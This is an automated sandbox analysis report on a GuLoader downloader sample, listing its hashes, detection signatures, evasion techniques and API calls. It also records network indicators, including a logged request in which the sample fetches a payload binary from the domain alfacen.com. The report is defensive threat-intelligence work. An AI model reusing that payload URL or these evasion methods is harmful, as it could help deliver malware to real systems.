Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
450707124374000811.exe

Overview

General Information

Sample name:450707124374000811.exe
Analysis ID:1538185
MD5:22aeab62009aaa9073b3159d7da1195e
SHA1:602dd47b6910a522be90fc47d10d5c26a836a01a
SHA256:1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 450707124374000811.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
    • 450707124374000811.exe (PID: 5704 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2851812607.0000000002C18000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: 450707124374000811.exeAvira: detected
    Multi AV Scanner detection for submitted file
    Source: 450707124374000811.exeReversingLabs: Detection: 44%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 450707124374000811.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.5:49974 version: TLS 1.2
    Source: 450707124374000811.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: Joe Sandbox ViewIP Address: 193.107.36.30 193.107.36.30
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /GZgWeuQ77.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: alfacen.com
    Source: 450707124374000811.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bin
    Source: 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binH
    Source: 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binR
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bince
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bine
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bines
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binnsz
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.5:49974 version: TLS 1.2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359835C0 NtCreateMutant,LdrInitializeThunk,4_2_359835C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_35982DF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_35982C70
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983090 NtSetValueKey,4_2_35983090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983010 NtOpenDirectoryObject,4_2_35983010
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983D10 NtOpenProcessToken,4_2_35983D10
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983D70 NtOpenThread,4_2_35983D70
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359839B0 NtGetContextThread,4_2_359839B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35984650 NtSuspendThread,4_2_35984650
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35984340 NtSetContextThread,4_2_35984340
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982DB0 NtEnumerateKey,4_2_35982DB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982DD0 NtDelayExecution,4_2_35982DD0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982D10 NtMapViewOfSection,4_2_35982D10
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982D00 NtSetInformationFile,4_2_35982D00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982D30 NtUnmapViewOfSection,4_2_35982D30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982CA0 NtQueryInformationToken,4_2_35982CA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982CC0 NtQueryVirtualMemory,4_2_35982CC0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982CF0 NtOpenProcess,4_2_35982CF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982C00 NtQueryInformationProcess,4_2_35982C00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982C60 NtCreateKey,4_2_35982C60
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982F90 NtProtectVirtualMemory,4_2_35982F90
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982FB0 NtResumeThread,4_2_35982FB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982FA0 NtQuerySection,4_2_35982FA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982FE0 NtCreateFile,4_2_35982FE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982F30 NtCreateSection,4_2_35982F30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982F60 NtCreateProcessEx,4_2_35982F60
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982E80 NtReadVirtualMemory,4_2_35982E80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982EA0 NtAdjustPrivilegesToken,4_2_35982EA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982EE0 NtQueueApcThread,4_2_35982EE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982E30 NtWriteVirtualMemory,4_2_35982E30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982B80 NtQueryInformationFile,4_2_35982B80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982BA0 NtEnumerateValueKey,4_2_35982BA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982BF0 NtAllocateVirtualMemory,4_2_35982BF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982BE0 NtQueryValueKey,4_2_35982BE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982B60 NtClose,4_2_35982B60
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982AB0 NtWaitForSingleObject,4_2_35982AB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982AD0 NtReadFile,4_2_35982AD0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982AF0 NtWriteFile,4_2_35982AF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00404C620_2_00404C62
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00406ADD0_2_00406ADD
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004072B40_2_004072B4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359ED5B04_2_359ED5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A195C34_2_35A195C3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A075714_2_35A07571
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0F43F4_2_35A0F43F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359414604_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0F7B04_2_35A0F7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A016CC4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359956304_2_35995630
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595B1B04_2_3595B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1B16B4_2_35A1B16B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F1724_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3598516C4_2_3598516C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0F0E04_2_35A0F0E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A070E94_2_35A070E9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF0CC4_2_359FF0CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C04_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599739A4_2_3599739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0132D4_2_35A0132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D34C4_2_3593D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A04_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C04_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596FDC04_2_3596FDC0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A07D734_2_35A07D73
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D404_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A01D5A4_2_35A01D5A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35911CAF4_2_35911CAF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FCF24_2_35A0FCF2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C9C324_2_359C9C32
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951F924_2_35951F92
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FFB14_2_35A0FFB1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35913FD24_2_35913FD2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35913FD54_2_35913FD5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FF094_2_35A0FF09
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35959EB04_2_35959EB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E59104_2_359E5910
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359599504_2_35959950
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B9504_2_3596B950
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359538E04_2_359538E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD8004_2_359BD800
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596FB804_2_3596FB80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3598DBF94_2_3598DBF9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C5BF04_2_359C5BF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FB764_2_35A0FB76
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EDAAC4_2_359EDAAC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35995AA04_2_35995AA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F1AA34_2_359F1AA3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FDAC64_2_359FDAC6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A07A464_2_35A07A46
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FA494_2_35A0FA49
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C3A6C4_2_359C3A6C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A105914_2_35A10591
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359505354_2_35950535
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FE4F64_2_359FE4F6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F44204_2_359F4420
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A024464_2_35A02446
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594C7C04_2_3594C7C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359747504_2_35974750
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359507704_2_35950770
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596C6E04_2_3596C6E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A041A24_2_35A041A2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A101AA4_2_35A101AA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A081CC4_2_35A081CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EA1184_2_359EA118
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359401004_2_35940100
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D81584_2_359D8158
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E20004_2_359E2000
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A103E64_2_35A103E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595E3F04_2_3595E3F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0A3524_2_35A0A352
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D02C04_2_359D02C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F02744_2_359F0274
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35968DBF4_2_35968DBF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594ADE04_2_3594ADE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359ECD1F4_2_359ECD1F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595AD004_2_3595AD00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F0CB54_2_359F0CB5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35940CF24_2_35940CF2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35950C004_2_35950C00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CEFA04_2_359CEFA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35942FC84_2_35942FC8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595CFE04_2_3595CFE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35970F304_2_35970F30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F2F304_2_359F2F30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35992F284_2_35992F28
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C4F404_2_359C4F40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35962E904_2_35962E90
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0CE934_2_35A0CE93
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0EEDB4_2_35A0EEDB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0EE264_2_35A0EE26
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35950E594_2_35950E59
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1A9A64_2_35A1A9A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359529A04_2_359529A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359669624_2_35966962
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359368B84_2_359368B8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597E8F04_2_3597E8F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359528404_2_35952840
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595A8404_2_3595A840
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A06BD74_2_35A06BD7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0AB404_2_35A0AB40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594EA804_2_3594EA80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 35997E54 appears 111 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 359CF290 appears 105 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 35985130 appears 58 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 359BEA12 appears 86 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 3593B970 appears 280 times
    Source: 450707124374000811.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 450707124374000811.exe, 00000004.00000002.3610107598.0000000035BE1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.3249022839.00000000356E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.3251140452.0000000035897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
    Source: C:\Users\user\Desktop\450707124374000811.exeFile created: C:\Users\user\AppData\Roaming\pechayJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeFile created: C:\Users\user\AppData\Local\Temp\nso4568.tmpJump to behavior
    Source: 450707124374000811.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\450707124374000811.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 450707124374000811.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\450707124374000811.exeFile read: C:\Users\user\Desktop\450707124374000811.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: coreuicomponents.dllJump to behavior
